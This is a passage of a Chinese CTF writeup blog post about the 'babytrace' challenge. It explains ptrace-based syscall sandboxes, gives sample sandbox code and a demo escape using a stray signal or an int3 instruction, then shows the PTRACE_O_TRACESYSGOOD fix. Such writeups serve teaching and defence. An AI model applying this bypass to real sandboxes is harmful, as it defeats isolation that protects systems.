<!DOCTYPE html>
<html lang="zh-CN"><head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">

  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16.png">
  <link rel="manifest" href="/images/site.webmanifest">
  <link rel="shortcut icon" href="/images/favicon.ico">

  <meta name="viewport" content="width=device-width, initial-scale=1">
  <script>
    (function() {
      var savedTheme = localStorage.getItem('user-color-scheme');
      var validThemes = ['dark', 'light', 'blue-white'];
      var theme = validThemes.indexOf(savedTheme) !== -1
        ? savedTheme
        : (window.matchMedia('(prefers-color-scheme: light)').matches ? 'light' : 'dark');
      document.documentElement.setAttribute('data-theme', theme);
    })();
  </script><!-- Begin Jekyll SEO tag v2.9.0 -->
<title>西湖论剑 2025 PWN Writeup | Y²的博客</title>
<meta name="generator" content="Jekyll v4.4.1" />
<meta property="og:title" content="西湖论剑 2025 PWN Writeup" />
<meta name="author" content="Y² (aka.cameudis)" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="babytrace" />
<meta name="twitter:description" property="og:description" content="babytrace" />
<link rel="canonical" href="https://www.cameudis.com/2025/01/20/XHLJ-2025.html" />
<meta property="og:url" content="https://www.cameudis.com/2025/01/20/XHLJ-2025.html" />
<meta property="og:site_name" content="Y²的博客" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2025-01-20T00:00:00+08:00" />
<meta property="article:modified_time" content="2025-01-20T00:00:00+08:00" />
<meta name="twitter:card" content="summary" />
<meta name="twitter:title" content="西湖论剑 2025 PWN Writeup" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"Y² (aka.cameudis)"},"dateModified":"2025-01-20T00:00:00+08:00","datePublished":"2025-01-20T00:00:00+08:00","description":"babytrace","headline":"西湖论剑 2025 PWN Writeup","mainEntityOfPage":{"@type":"WebPage","@id":"https://www.cameudis.com/2025/01/20/XHLJ-2025.html"},"url":"https://www.cameudis.com/2025/01/20/XHLJ-2025.html"}</script>
<!-- End Jekyll SEO tag -->
<link rel="stylesheet" href="/assets/main.css?v=20260715-external-link-icons"><link type="application/atom+xml" rel="alternate" href="https://www.cameudis.com/feed.xml" title="Y²的博客" /><script src="/assets/js/theme.js" defer></script>
</head>
<body class="layout-post"><header class="site-header" role="banner">
  <div class="wrapper"><div class="header-content">
      <div class="header-content-left">
        <a class="site-title" rel="author" href="/">Y²的博客</a>

        <button class="search-button" id="search-toggle" type="button" aria-label="搜索">
          <svg width="20px" height="20px" viewBox="0 0 100 100" style="shape-rendering: crispEdges;">
            <!-- Frame -->
            <rect x="30" y="10" width="10" height="10" />
            <rect x="40" y="10" width="10" height="10" />
            <rect x="50" y="10" width="10" height="10" />
            <rect x="20" y="20" width="10" height="10" />
            <rect x="60" y="20" width="10" height="10" />
            <rect x="10" y="30" width="10" height="10" />
            <rect x="70" y="30" width="10" height="10" />
            <rect x="10" y="40" width="10" height="10" />
            <rect x="70" y="40" width="10" height="10" />
            <rect x="10" y="50" width="10" height="10" />
            <rect x="70" y="50" width="10" height="10" />
            <rect x="20" y="60" width="10" height="10" />
            <rect x="60" y="60" width="10" height="10" />
            <rect x="30" y="70" width="10" height="10" />
            <rect x="40" y="70" width="10" height="10" />
            <rect x="50" y="70" width="10" height="10" />
            <!-- Handle -->
            <rect x="70" y="70" width="10" height="10" />
            <rect x="80" y="80" width="10" height="10" />
            <rect x="90" y="90" width="10" height="10" />
          </svg>
        </button>

        <div class="theme-picker" id="theme-picker">
          <button class="theme-picker-trigger" id="theme-picker-trigger" type="button"
            aria-label="选择主题" aria-haspopup="menu" aria-expanded="false" aria-controls="theme-picker-menu">
            <span class="theme-picker-bracket" aria-hidden="true">[</span>
            <span class="theme-picker-label">THEME</span>
            <span class="theme-picker-divider" aria-hidden="true">//</span>
            <span class="theme-picker-current">蓝白</span>
            <span class="theme-picker-bracket" aria-hidden="true">]</span>
            <span class="theme-picker-arrow" aria-hidden="true"></span>
          </button>
          <div class="theme-picker-menu" id="theme-picker-menu" role="menu" aria-label="主题选项" hidden>
            <button type="button" role="menuitemradio" data-theme-value="dark" data-theme-label="夜间">
              <span class="theme-option-index">01</span>
              <span class="theme-option-swatch theme-option-swatch-dark" aria-hidden="true"></span>
              <span class="theme-option-label">夜间</span>
              <span class="theme-option-state">OFF</span>
            </button>
            <button type="button" role="menuitemradio" data-theme-value="light" data-theme-label="日间">
              <span class="theme-option-index">02</span>
              <span class="theme-option-swatch theme-option-swatch-light" aria-hidden="true"></span>
              <span class="theme-option-label">日间</span>
              <span class="theme-option-state">OFF</span>
            </button>
            <button type="button" role="menuitemradio" data-theme-value="blue-white" data-theme-label="蓝白">
              <span class="theme-option-index">03</span>
              <span class="theme-option-swatch theme-option-swatch-blue" aria-hidden="true"></span>
              <span class="theme-option-label">蓝白</span>
              <span class="theme-option-state">OFF</span>
            </button>
          </div>
        </div>
      </div><nav class="site-nav">
        <input type="checkbox" id="nav-trigger" class="nav-trigger" />
        <label for="nav-trigger">
          <span class="menu-icon">
            <svg viewBox="0 0 18 15" width="18px" height="15px">
              <path
                d="M18,1.484c0,0.82-0.665,1.484-1.484,1.484H1.484C0.665,2.969,0,2.304,0,1.484l0,0C0,0.665,0.665,0,1.484,0 h15.032C17.335,0,18,0.665,18,1.484L18,1.484z M18,7.516C18,8.335,17.335,9,16.516,9H1.484C0.665,9,0,8.335,0,7.516l0,0 c0-0.82,0.665-1.484,1.484-1.484h15.032C17.335,6.031,18,6.696,18,7.516L18,7.516z M18,13.516C18,14.335,17.335,15,16.516,15H1.484 C0.665,15,0,14.335,0,13.516l0,0c0-0.82,0.665-1.483,1.484-1.483h15.032C17.335,12.031,18,12.695,18,13.516L18,13.516z" />
            </svg>
          </span>
        </label>
        <div class="trigger"><a class="page-link" href="/about/">About</a><a class="page-link" href="/diary/">Diary</a><a class="page-link" href="/links/">Links</a><a class="page-link" href="/readings/">Readings</a></div>
      </nav></div>
  </div>
</header>

<!-- 搜索弹窗 -->
<div class="search-overlay" id="search-overlay" aria-hidden="true"
  data-pagefind-url="/pagefind/pagefind.js">
  <div class="search-modal" role="dialog" aria-modal="true" aria-label="文章搜索">
    <div class="search-header">
      <input type="search" id="search-input" placeholder="搜索文章..." autocomplete="off"
        aria-label="搜索文章" aria-controls="search-results">
      <button class="search-close" id="search-close" type="button" aria-label="关闭搜索">&times;</button>
    </div>
    <div class="search-results" id="search-results" aria-live="polite"></div>
  </div>
</div>

<script src="/assets/js/search.js" defer></script>
<main class="page-content" aria-label="Content">
    <div class="wrapper">
      <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">

        <header class="post-header">
          <h1 class="post-title p-name" itemprop="name headline"
            data-pagefind-meta="title, date:2025-01-20">西湖论剑 2025 PWN Writeup</h1>
          <div class="post-meta">
            <time class="dt-published" datetime="2025-01-20T00:00:00+08:00" itemprop="datePublished">[ 2025-01-20 ]
            </time>
            
            <span class="post-tags" data-pagefind-meta="tags">:: #pwn</span>
            </div>
        </header>

        <div class="post-layout-container">
          <aside class="post-toc">
            <div class="toc-title">TABLE_OF_CONTENTS</div>
            <button class="toc-toggle" type="button" aria-expanded="false" aria-controls="post-toc-list">
              <span class="toc-toggle-label">TABLE_OF_CONTENTS</span>
              <span class="toc-toggle-icon" aria-hidden="true"></span>
            </button>
            <ul id="post-toc-list"><li><a href="#babytrace">babytrace</a><ul><li><a href="#ptrace-原理">ptrace 原理</a></li><li><a href="#ptrace-sandbox">ptrace sandbox</a></li><li><a href="#ptrace-bad-use">ptrace bad use</a></li><li><a href="#ptrace-good-use">ptrace good use</a></li><li><a href="#利用">利用</a></li></ul></li><li><a href="#vpwn">vpwn</a></li><li><a href="#heavens-door">Heaven’s door</a></li><li><a href="#一个相对完善的-ptrace-sandbox">一个相对完善的 ptrace sandbox</a></li></ul>
          </aside>

          <div class="post-content e-content" itemprop="articleBody" data-pagefind-body>
            <h2 id="babytrace">babytrace</h2>

<p>本题基于 <code class="language-plaintext highlighter-rouge">ptrace</code> 实现了一个简易的 syscall 沙盒，由父进程检测子进程，子进程与用户交互。每次子进程进入 syscall 时，父进程会检测保存在 <code class="language-plaintext highlighter-rouge">orig_rax</code> 中的 syscall number，如果不在白名单内就将 <code class="language-plaintext highlighter-rouge">rax</code> 强制改为 <code class="language-plaintext highlighter-rouge">-1</code>。</p>

<p>在互联网上搜索关键词 <code class="language-plaintext highlighter-rouge">pwn ptrace sandbox</code> 即可搜到这一篇 writeup：<a href="https://ctftime.org/writeup/20115">CTFtime.org / PlaidCTF 2020 / sandybox / Writeup</a>，教你如何使用 <code class="language-plaintext highlighter-rouge">INT3</code> 来绕过这种 sandbox 设计，但作者并没有仔细分析为什么 <code class="language-plaintext highlighter-rouge">INT3</code> 有这种神奇的效果。Let’s dive in…</p>

<h3 id="ptrace-原理">ptrace 原理</h3>

<p>ptrace 是一套 Linux 提供的调试机制，允许一个进程 attach 到另一个进程，设置各点断点，并操控其寄存器、内存等状态。</p>

<p>在 ptrace 的 man 手册中，我们可以看到其实现方法。</p>

<blockquote>
  <p>While being traced, the tracee will stop each time a signal is delivered, even if the signal is being ignored.  (An exception is SIGKILL, which has its usual effect.)  The tracer will be notified at its next call to waitpid(2) (or one of the  related “wait” system calls); that call will return a status value containing information that indicates the cause of the stop in the tracee.  While the tracee is stopped, the tracer can use various ptrace operations  to  inspect  and modify  the  tracee.   The tracer then causes the tracee to continue, optionally ignoring the delivered signal (or even delivering a different signal instead).</p>
</blockquote>

<p>被调试进程（tracee）每次收到一个信号，都会暂停下来，等待调试进程（tracer）调用 <code class="language-plaintext highlighter-rouge">waitpid</code>。在 tracer 从 <code class="language-plaintext highlighter-rouge">waitpid</code> 中返回，执行了一些调试相关操作后，它会通知内核继续执行 tracee 程序。tracer 可以通过 ` waitpid ` 设置的 ` status ` 来获取 tracee 停下的原因，即 tracee 是因为哪一个信号而停下来的， 比如是 ` SIGKILL ` 还是 ` SIGTRAP `？</p>

<p>如果我们要监视某个进程的 syscall，我们可以使用 <code class="language-plaintext highlighter-rouge">ptrace(PTRACE_SYSCALL, pid, 0, 0)</code> ，让内核在下次 tracee <strong>执行或退出</strong> syscall 的时候给其发送一个 <code class="language-plaintext highlighter-rouge">SIGTRAP</code> 信号，将其停下来。详细的说明可以在 man 中找到：</p>

<blockquote>
  <p>PTRACE_SYSCALL, PTRACE_SINGLESTEP
Restart the stopped tracee as for PTRACE_CONT, but arrange for the tracee to be stopped at the next entry to or exit from a system call, or after execution of a single instruction, respectively. (The tracee will also, as usual, be stopped upon receipt of a signal.) From the tracer’s perspective, the tracee will appear to have been stopped by receipt of a SIGTRAP.
So, for PTRACE_SYSCALL, for example, the idea is to inspect the arguments to the system call at the first stop, then do another PTRACE_SYSCALL and inspect the return value of the system call at the second stop. The data argument is treated as for PTRACE_CONT. (addr is ignored.)</p>
</blockquote>

<p>这段文字中，官方给出的使用例是这样的：</p>

<ol>
  <li><code class="language-plaintext highlighter-rouge">ptrace(PTRACE_SYSCALL); wait();</code></li>
  <li>检查 syscall 参数</li>
  <li><code class="language-plaintext highlighter-rouge">ptrace(PTRACE_SYSCALL); wait();</code></li>
  <li>检查 syscall 返回值</li>
</ol>

<p>知道这些以后，我们就可以实现一个简单的 ptrace sandbox 了。</p>

<h3 id="ptrace-sandbox">ptrace sandbox</h3>

<p>题目的 sandbox 实现类似这样（可以拿去编译改改玩玩）：</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;stdlib.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;unistd.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/prctl.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/ptrace.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/wait.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/user.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/syscall.h&gt;</span><span class="cp">
</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span><span class="n">argv</span><span class="p">[]){</span>
  <span class="k">struct</span> <span class="n">user_regs_struct</span> <span class="n">regs</span><span class="p">;</span>
  <span class="kt">int</span> <span class="n">stat_loc</span><span class="p">;</span>
  <span class="kt">int</span> <span class="n">pid</span> <span class="o">=</span> <span class="n">fork</span><span class="p">();</span>
  
  <span class="k">if</span> <span class="p">(</span><span class="n">pid</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// child</span>

    <span class="c1">// waiting for parent to attach...</span>
    <span class="n">prctl</span><span class="p">(</span><span class="n">PR_SET_PDEATHSIG</span><span class="p">,</span> <span class="n">SIGKILL</span><span class="p">);</span>
    <span class="n">ptrace</span><span class="p">(</span><span class="n">PTRACE_TRACEME</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
    <span class="kt">int</span> <span class="n">mypid</span> <span class="o">=</span> <span class="n">getpid</span><span class="p">();</span>
    <span class="n">kill</span><span class="p">(</span><span class="n">mypid</span><span class="p">,</span> <span class="n">SIGSTOP</span><span class="p">);</span>

    <span class="c1">// do something...</span>
    <span class="n">system</span><span class="p">(</span><span class="s">"echo hello"</span><span class="p">);</span>
    <span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
    
  <span class="p">}</span> <span class="k">else</span> <span class="p">{</span> <span class="c1">// parent</span>

    <span class="k">if</span> <span class="p">(</span><span class="n">waitpid</span><span class="p">(</span><span class="n">pid</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">stat_loc</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span>
      <span class="n">puts</span><span class="p">(</span><span class="s">"waitpid error1"</span><span class="p">);</span>

    <span class="c1">// monitor syscall</span>
    <span class="k">do</span> <span class="p">{</span>
      <span class="c1">// wait child to stop at syscall</span>
      <span class="n">ptrace</span><span class="p">(</span><span class="n">PTRACE_SYSCALL</span><span class="p">,</span> <span class="n">pid</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
      <span class="k">if</span> <span class="p">(</span><span class="n">waitpid</span><span class="p">(</span><span class="n">pid</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">stat_loc</span><span class="p">,</span> <span class="n">__WALL</span><span class="p">)</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span>
        <span class="n">puts</span><span class="p">(</span><span class="s">"waitpid error2"</span><span class="p">);</span>

      <span class="c1">// exit if child die</span>
      <span class="k">if</span> <span class="p">(</span><span class="n">WIFEXITED</span><span class="p">(</span><span class="n">stat_loc</span><span class="p">)</span> <span class="o">||</span> <span class="n">WIFSTOPPED</span><span class="p">(</span><span class="n">stat_loc</span><span class="p">)</span> <span class="o">&amp;&amp;</span> <span class="n">WSTOPSIG</span><span class="p">(</span><span class="n">stat_loc</span><span class="p">)</span> <span class="o">==</span> <span class="n">SIGSEGV</span><span class="p">)</span>
        <span class="k">break</span><span class="p">;</span>

      <span class="c1">// perform check</span>
      <span class="k">if</span> <span class="p">(</span> <span class="n">ptrace</span><span class="p">(</span><span class="n">PTRACE_GETREGS</span><span class="p">,</span> <span class="n">pid</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">regs</span><span class="p">)</span> <span class="o">&lt;</span> <span class="mi">0</span> <span class="p">)</span>
        <span class="n">puts</span><span class="p">(</span><span class="s">"GETREGS error"</span><span class="p">);</span>
      <span class="kt">size_t</span> <span class="n">syscall_num</span> <span class="o">=</span> <span class="n">regs</span><span class="p">.</span><span class="n">orig_rax</span><span class="p">;</span>
      <span class="n">printf</span><span class="p">(</span><span class="s">"[*] Syscall number: %ld</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">syscall_num</span><span class="p">);</span>
      
      <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="p">(</span><span class="n">syscall_num</span> <span class="o">==</span> <span class="n">SYS_read</span> <span class="o">||</span>
            <span class="n">syscall_num</span> <span class="o">==</span> <span class="n">SYS_write</span> <span class="o">||</span>
            <span class="n">syscall_num</span> <span class="o">==</span> <span class="n">SYS_fstat</span> <span class="o">||</span>
            <span class="n">syscall_num</span> <span class="o">==</span> <span class="n">SYS_exit</span> <span class="o">||</span>
            <span class="n">syscall_num</span> <span class="o">==</span> <span class="n">SYS_exit_group</span><span class="p">))</span> <span class="p">{</span>
        <span class="n">puts</span><span class="p">(</span><span class="s">"[*] Bad Syscall"</span><span class="p">);</span>
        <span class="n">regs</span><span class="p">.</span><span class="n">orig_rax</span> <span class="o">=</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
        <span class="k">if</span> <span class="p">(</span> <span class="n">ptrace</span><span class="p">(</span><span class="n">PTRACE_SETREGS</span><span class="p">,</span> <span class="n">pid</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">regs</span><span class="p">)</span> <span class="o">&lt;</span> <span class="mi">0</span> <span class="p">)</span>
          <span class="n">puts</span><span class="p">(</span><span class="s">"SETREGS error"</span><span class="p">);</span>
        <span class="p">}</span>

      <span class="c1">// wait for syscall ret</span>
      <span class="n">ptrace</span><span class="p">(</span><span class="n">PTRACE_SYSCALL</span><span class="p">,</span> <span class="n">pid</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
      <span class="k">if</span> <span class="p">(</span> <span class="n">waitpid</span><span class="p">(</span><span class="n">pid</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">stat_loc</span><span class="p">,</span> <span class="n">__WALL</span><span class="p">)</span> <span class="o">&lt;</span> <span class="mi">0</span> <span class="p">)</span>
        <span class="n">puts</span><span class="p">(</span><span class="s">"waitpid error3"</span><span class="p">);</span>

    <span class="p">}</span> <span class="k">while</span> <span class="p">(</span><span class="o">!</span><span class="n">WIFEXITED</span><span class="p">(</span><span class="n">stat_loc</span><span class="p">)</span> <span class="o">&amp;&amp;</span> <span class="p">(</span><span class="o">!</span><span class="n">WIFSTOPPED</span><span class="p">(</span><span class="n">stat_loc</span><span class="p">)</span> <span class="o">||</span> <span class="n">WSTOPSIG</span><span class="p">(</span><span class="n">stat_loc</span><span class="p">)</span> <span class="o">!=</span> <span class="n">SIGSEGV</span><span class="p">));</span>
  <span class="p">}</span>
  <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>在父进程的 do-while 循环中，有两次 <code class="language-plaintext highlighter-rouge">ptrace(PTRACE_SYSCALL, pid, 0, 0)</code>，这分别对应进入和退出 syscall。我们只需要检查进入 syscall 时的参数，所以第二次 <code class="language-plaintext highlighter-rouge">ptrace</code> 停下后我们只是什么都不干，继续下一次循环。</p>

<p>直接编译运行程序，我们应该可以看到子进程并没有成功运行 <code class="language-plaintext highlighter-rouge">system("echo 'Hello, world!'");</code>，这表明我们的功能似乎正常执行了。</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>./a.out
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Syscall number: 13
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Bad Syscall
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Syscall number: 13
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Bad Syscall
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Syscall number: 14
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Bad Syscall
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Syscall number: 9
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Bad Syscall
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Syscall number: 13
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Bad Syscall
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Syscall number: 13
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Bad Syscall
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Syscall number: 14
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Bad Syscall
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Syscall number: 231
</code></pre></div></div>

<h3 id="ptrace-bad-use">ptrace bad use</h3>

<p>然而，这段代码中还缺少了一个非常重要的部分——检查 tracee 是因为什么原因而停下来的。在上一节中我们提到，<code class="language-plaintext highlighter-rouge"> ptrace(PTRACE_SYSCALL, pid, 0, 0) </code> 的功能是让内核在下次进入或退出 syscall 的时候，给 tracee 发送一个 SIGTRAP 信号。tracer 不能确保 waitpid 返回是因为子进程进入了 syscall 还是什么其他的原因。</p>

<p>让我们对子进程做出一些修改（同时，在父进程里允许 clock_nanosleep 系统调用）：</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// waiting for parent to attach...</span>
<span class="n">prctl</span><span class="p">(</span><span class="n">PR_SET_PDEATHSIG</span><span class="p">,</span> <span class="n">SIGKILL</span><span class="p">);</span>
<span class="n">ptrace</span><span class="p">(</span><span class="n">PTRACE_TRACEME</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="kt">int</span> <span class="n">mypid</span> <span class="o">=</span> <span class="n">getpid</span><span class="p">();</span>
<span class="n">kill</span><span class="p">(</span><span class="n">mypid</span><span class="p">,</span> <span class="n">SIGSTOP</span><span class="p">);</span>

<span class="c1">// do something...</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"Child PID: %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">mypid</span><span class="p">);</span>
<span class="n">sleep</span><span class="p">(</span><span class="mi">10</span><span class="p">);</span>

<span class="n">system</span><span class="p">(</span><span class="s">"echo 'Hello, World!'"</span><span class="p">);</span>
<span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
</code></pre></div></div>

<p>现在，子进程会在调用 system 函数前进入一段 10s 的睡眠时间。让我们趁着这个机会，给子进程发个随便什么信号试试：</p>

<p><img loading="lazy" decoding="async" src="https://blog-1308958542.cos.ap-shanghai.myqcloud.com/202501201356700.png" alt="image.png" /></p>

<p>BOOM！子进程逃出了沙盒，成功执行了 <code class="language-plaintext highlighter-rouge">system("echo 'Hello, World!'")</code>。这是因为，我们发送给子进程的 <code class="language-plaintext highlighter-rouge">SIGSTOP</code> 信号被捕捉，父进程以为此时子进程进入了 syscall entry。因此，后续子进程真正进入 syscall entry 时，父进程会将其当成 syscall exit，不进行检查。</p>

<p>我们这里是借助了一个第三方进程进行攻击，有没有办法让子进程给自身发送一个信号呢？我们通常发送信号使用的 kill 同时也是一个系统调用，会被沙盒限制，遗憾离场了。</p>

<p>在 amd64 架构的 Linux 中，有一些 <code class="language-plaintext highlighter-rouge">int</code> 指令被赋予了特殊的作用。如果你熟悉 GDB 的断点原理的话，就会知道 <code class="language-plaintext highlighter-rouge">INT3</code> 指令的神奇功效，这条指令专门用来产生一个 <code class="language-plaintext highlighter-rouge">SIGTRAP</code>。GDB 同样基于 ptrace 进行调试，当你执行 <code class="language-plaintext highlighter-rouge">b *0x415411</code> 时，GDB 会在保存 <code class="language-plaintext highlighter-rouge">0x415411</code> 处的一个字节后将其覆盖为 <code class="language-plaintext highlighter-rouge">INT3</code> 指令。在执行了这条 <code class="language-plaintext highlighter-rouge">INT3</code> 之后，被调试的进程收到一个 <code class="language-plaintext highlighter-rouge">SIGTRAP</code>，控制就回到了 GDB 的手中。</p>

<p>我们可以让子进程在进行 <code class="language-plaintext highlighter-rouge">system()</code> 前先执行一次 ` INT3 ` 指令，同样可以逃出 sandbox。</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// do something...</span>
<span class="n">asm</span><span class="p">(</span><span class="s">"int3"</span><span class="p">);</span>
<span class="n">system</span><span class="p">(</span><span class="s">"echo 'Hello, World!'"</span><span class="p">);</span>
<span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
</code></pre></div></div>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>gcc pt.c <span class="o">&amp;&amp;</span> ./a.out
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Syscall number: <span class="nt">-1</span>
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Bad Syscall
...
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Syscall number: 14
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Bad Syscall
Hello, World!
...
</code></pre></div></div>

<p>第一行 <code class="language-plaintext highlighter-rouge">[*] Syscall number: -1</code> ，就是那条 <code class="language-plaintext highlighter-rouge">INT3</code> 指令产生的 <code class="language-plaintext highlighter-rouge">SIGTRAP</code> 被父进程捕获时产生的输出。</p>

<p>除了 <code class="language-plaintext highlighter-rouge">INT3</code> 以外，<code class="language-plaintext highlighter-rouge">INT1</code> 也有类似的功能，也是本文在攻击时使用的方法（GLIBC 中居然神奇地存在 <code class="language-plaintext highlighter-rouge">INT1; ret;</code> gadget）。详情参考 <a href="https://github.com/Mic92/x86_64-linux-cheatsheats/blob/master/pages/INT1">x86_64-linux-cheatsheats/pages/INT1 at master · Mic92/x86_64-linux-cheatsheats · GitHub</a>。</p>

<h3 id="ptrace-good-use">ptrace good use</h3>

<p>实际上，ptrace 机制已经给程序提供了区分同一个信号（如 <code class="language-plaintext highlighter-rouge">SIGTRAP</code>）的不同来源（syscall 还是 int3）的方法。在 <code class="language-plaintext highlighter-rouge">PTRACE_SETOPTIONS</code> 的各个 flag 说明中，有一个 flag 名为 <code class="language-plaintext highlighter-rouge">PTRACE_O_TRACESYSGOOD</code>。其说明如下：</p>

<blockquote>
  <p>PTRACE_O_TRACESYSGOOD (since Linux 2.4.6)
	When delivering system call traps, set bit 7 in the signal number  (i.e.,  deliver  SIGTRAP|0x80).   This makes it easy for the tracer to distinguish normal traps from those caused by a system call.</p>
</blockquote>

<p>也就是说，只要 tracer 在初始化时执行：</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">ptrace</span><span class="p">(</span><span class="n">PTRACE_SETOPTIONS</span><span class="p">,</span> <span class="n">pid</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">PTRACE_O_TRACESYSGOOD</span><span class="p">);</span>
</code></pre></div></div>

<p>他就可以这样来检测当前是否为 syscall 进入/退出导致的 SIGTRAP：</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">ptrace</span><span class="p">(</span><span class="n">PTRACE_SYSCALL</span><span class="p">,</span> <span class="n">pid</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">waitpid</span><span class="p">(</span><span class="n">pid</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">stat_loc</span><span class="p">,</span> <span class="n">__WALL</span><span class="p">)</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span>
  <span class="n">puts</span><span class="p">(</span><span class="s">"waitpid error2"</span><span class="p">);</span>

<span class="k">if</span> <span class="p">(</span><span class="n">WIFSTOPPED</span><span class="p">(</span><span class="n">stat_loc</span><span class="p">)</span> <span class="o">&amp;&amp;</span> <span class="n">WSTOPSIG</span><span class="p">(</span><span class="n">stat_loc</span><span class="p">)</span> <span class="o">==</span> <span class="n">SIGTRAP</span><span class="o">|</span><span class="mh">0x80</span><span class="p">)</span>
  <span class="n">puts</span><span class="p">(</span><span class="s">"Bingo! Syscall handled."</span><span class="p">);</span>
</code></pre></div></div>

<p>我们可以包装一个用来捕获 syscall 进入/退出的函数，只有在子进程已死或进入退出 syscall 时，这个函数才会返回：</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">break_syscall</span><span class="p">(</span><span class="kt">unsigned</span> <span class="n">pid</span><span class="p">,</span> <span class="k">struct</span> <span class="n">user_regs_struct</span> <span class="o">*</span><span class="n">regs</span><span class="p">){</span>
  <span class="kt">int</span> <span class="n">stat_loc</span><span class="p">;</span>
  <span class="k">do</span> <span class="p">{</span>
    <span class="n">ptrace</span><span class="p">(</span><span class="n">PTRACE_SYSCALL</span><span class="p">,</span> <span class="n">pid</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">waitpid</span><span class="p">(</span><span class="n">pid</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">stat_loc</span><span class="p">,</span> <span class="n">__WALL</span><span class="p">)</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span>
      <span class="n">puts</span><span class="p">(</span><span class="s">"waitpid error"</span><span class="p">);</span>

    <span class="k">if</span> <span class="p">(</span><span class="n">WIFSTOPPED</span><span class="p">(</span><span class="n">stat_loc</span><span class="p">)</span> <span class="o">&amp;&amp;</span> <span class="n">WSTOPSIG</span><span class="p">(</span><span class="n">stat_loc</span><span class="p">)</span> <span class="o">==</span> <span class="p">(</span><span class="n">SIGTRAP</span> <span class="o">|</span> <span class="mh">0x80</span><span class="p">))</span> <span class="p">{</span>
